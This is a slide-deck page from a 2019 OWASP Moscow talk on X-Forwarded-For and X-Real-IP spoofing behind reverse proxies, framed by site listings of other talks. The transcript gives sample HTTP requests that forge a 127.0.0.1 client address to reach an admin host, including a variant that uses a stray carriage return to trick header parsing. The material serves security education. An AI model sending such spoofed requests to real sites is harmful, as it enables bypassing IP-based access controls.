«Свой среди чужих», Антон Лопаницын

December 06, 2019

450

«Свой среди чужих», Антон Лопаницын

Видео https://www.youtube.com/watch?v=JC8hwr9ILQw

Встреча Московского отделения OWASP, 6.12.2019 (https://www.meetup.com/OWASP-Moscow/events/266925142/)

OWASP Moscow

December 06, 2019

Tweet

More Decks by OWASP Moscow

See All by OWASP Moscow

"Evolution of Application Security Programs through OWASP SAMM 2.0", Yan Kravchenko

0

420

«Проекты OWASP: SAMM выпуск 2», Тарас Иващенко, OZON

0

600

«Типичные ошибки реализации SMS-аутентификации», Ramazan (r0hack), DETEACT

0

850

«Dev, Sec, Oops: How Agile Security increases Attack Surface», Денис Макрушин

0

560

«From captcha to RCE. Сложности реализации механизма CAPTCHA в изолированных системах», Виталий Малкин

0

470

«OWASP Сheat Sheet Series. Microservices-based security architecture documentation», Александр Барабанов

0

540

«Проекты OWASP: следим за безопасностью 3rd-party-компонент с помощью Dependency Track», Тарас Иващенко, OZON.

0

530

«Будущее без паролей: про FIDO2/WebAuthN и не только», Сергей Белов, Mail.Ru Group.

0

470

«CTFZone, или как перестать ресёрчить и полюбить CTF», Никита Вдовушкин, BI.ZONE.

1

460

Other Decks in Programming

See All in Programming

Streams APIとTCPフロー制御 / Web Streams API and TCP flow control

2

350

Less waste, more joy, and a lot more green: How Quarkus makes Java better

0

100

ふかぼれ！CSSセレクターモジュール / Fukabore! CSS Selectors Module

0

150

Pinia Colada が実現するスマートな非同期処理

4

220

Duckdb-Wasmでローカルダッシュボードを作ってみた

0

120

TypeScript Graph でコードレビューの心理的障壁を乗り越える

2

1.1k

Hotwire or React? ~アフタートーク・本編に含めなかった話~ / Hotwire or React? after talk

1

120

Amazon Bedrock Agentsを用いてアプリ開発してみた！

0

330

PHP でアセンブリ言語のように書く技術

1

170

型付き API リクエストを実現するいくつかの手法とその選択 / Typed API Request

8

2.2k

Nurturing OpenJDK distribution: Eclipse Temurin Success History and plan

0

870

Jakarta Concurrencyによる並行処理プログラミングの始め方 (JJUG CCC 2024 Fall)

1

290

Featured

See All Featured

Gamification - CAS2011

80

5k

5 minutes of I Can Smell Your CMS

202

19k

Optimising Largest Contentful Paint

33

2.9k

The World Runs on Bad Software

65

11k

Practical Orchestrator

186

10k

Git: the NoSQL Database

427

64k

Building a Scalable Design System with Sketch

459

33k

Bash Introduction

608

210k

Optimizing for Happiness

376

70k

Learning to Love Humans: Emotional Interface Design

273

40k

A better future with KSS

238

17k

Stop Working from a Prison Cell

267

20k

Transcript

Свой среди чужих Чужие среди своих
Reverse Proxy
None
X-Forwarded-For: <client>, <proxy> X-Forwarded-For: <fake>, <client>, <proxy>
HTTP-request GET / HTTP/1.1  Host: admin.my.site  Connection: close GET /
HTTP/1.1  Host: admin.my.site  X-Forwarded-For: 123.123.123.123, 192.168.1.1  Connection: close X-Forwarded-For: <client>, <proxy>
XFF/XRI Spooﬁng GET / HTTP/1.1  Host: admin.my.site X-Forwarded-For: 127.0.0.1  Connection:
close GET / HTTP/1.1  Host: admin.my.site  X-Forwarded-For: 127.0.0.1, 123.123.123.123, 192.168.1.1  Connection: close X-Forwarded-For: <fake>, <client>, <proxy>
HTTP-request GET / HTTP/1.1\r\n  Host: admin.my.site\r\n  X-Forwarded-For: 127.0.0.1\r\n  Connection: close\r\n
\r\n X-Forwarded-For: <fake>, <client>, <proxy>
HTTP-request with 0d GET / HTTP/1.1\r\n  Host: admin.my.site\r\n  X-Forwarded-For: 127.0.0.1\r\r\n 
Connection: close\r\n \r\n X-Forwarded-For: <fake>\r, <client>, <proxy>
XFF/XRI Spooﬁng+ GET / HTTP/1.1\r\n  Host: admin.my.site\r\n  X-Forwarded-For: 127.0.0.1\r\r\n  Connection:
close\r\n \r\n GET / HTTP/1.1  Host: admin.my.site  X-Forwarded-For: 127.0.0.1 , 123.123.123.123, 192.168.1.1  Connection: close X-Forwarded-For: <fake> , <client>, <proxy> Tomcat? WebSphere?
Twi: @i_bo0om Site: bo0om.ru Telegram: @webpwn